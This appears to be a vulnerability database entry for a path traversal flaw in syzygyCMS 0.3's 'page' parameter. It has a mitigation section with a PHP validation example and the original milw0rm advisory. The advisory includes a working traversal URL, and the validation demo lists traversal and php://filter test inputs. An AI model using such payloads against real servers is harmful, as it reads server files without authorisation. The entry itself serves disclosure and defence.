Vendor: syzygyCMS
By: SirGod
CVSS: 5.5 MEDIUM
Local File Inclusion
CWE: 22
Product Name: syzygyCMS
Affected Version From: 0.3
Affected Version To: 0.3
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2008

syzygyCMS 0.3 Local File Inclusion

syzygyCMS 0.3 has a Local File Inclusion vulnerability. An attacker can exploit it by manipulating the 'page' parameter in the URL to include arbitrary files from the server.

Mitigation:

To mitigate this vulnerability, it is recommended to validate and sanitize user input before including files from the server.
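
One way to apply this mitigation, as an added example that is not syzygyCMS code and not from the original advisory: the 'page' value is checked against a strict name pattern, then the resolved path is confirmed to lie inside the pages directory before anything is included. The function name `resolve_page`, the `.php` page layout and the temporary demo directory are assumptions made for illustration.

```php
<?php
// Added example, not syzygyCMS code. Assumes pages are PHP files stored in one
// directory and selected by the 'page' request parameter (names hypothetical).

function resolve_page(string $pagesDir, string $requested): ?string
{
    // 1. Accept only a simple page name: letters, digits, '_' and '-'.
    //    This rejects '/', '\', '.', NUL bytes and URL wrappers outright.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $requested)) {
        return null;
    }

    // 2. Resolve the base directory and the candidate to canonical paths.
    $base = realpath($pagesDir);
    $path = realpath($pagesDir . DIRECTORY_SEPARATOR . $requested . '.php');
    if ($base === false || $path === false) {
        return null; // directory or page does not exist
    }

    // 3. Containment check: the resolved file must sit inside the pages
    //    directory (catches symlinks that point somewhere else).
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a temporary pages directory holding a single page.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_demo_' . getmypid();
@mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'home.php', '<?php echo "home";');

// Constructed inputs, including the value from the advisory's example URL.
$samples = ['home', '../../../autoexec.bat', 'home.php', "home\0",
            'php://filter/resource=home', 'missing'];
foreach ($samples as $value) {
    $resolved = resolve_page($dir, $value);
    printf("%-32s => %s\n", json_encode($value),
        $resolved === null ? 'rejected (serve 404)' : 'include ' . basename($resolved));
}

// Clean up the demo files.
unlink($dir . DIRECTORY_SEPARATOR . 'home.php');
rmdir($dir);
```

In a real request handler the caller would pass the 'page' parameter to `resolve_page()` and return a 404 response whenever it yields `null`, instead of falling through to a default include.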
Source

Exploit-DB raw data:

######################################
[+] syzygyCMS 0.3 Local File Inclusion    
[+] Discovered By SirGod                           
[+] www.mortal-team.com                           
[+] Greetz : E.M.I.N.E.M, Ras ,Puscas_marin
[+] also ToxicBlood,MesSiAH,xZu
######################################

Example :

http://localhost/x/index.php?page=../../../autoexec.bat

This will open autoexec.bat.

###########################################

# milw0rm.com [2008-08-03]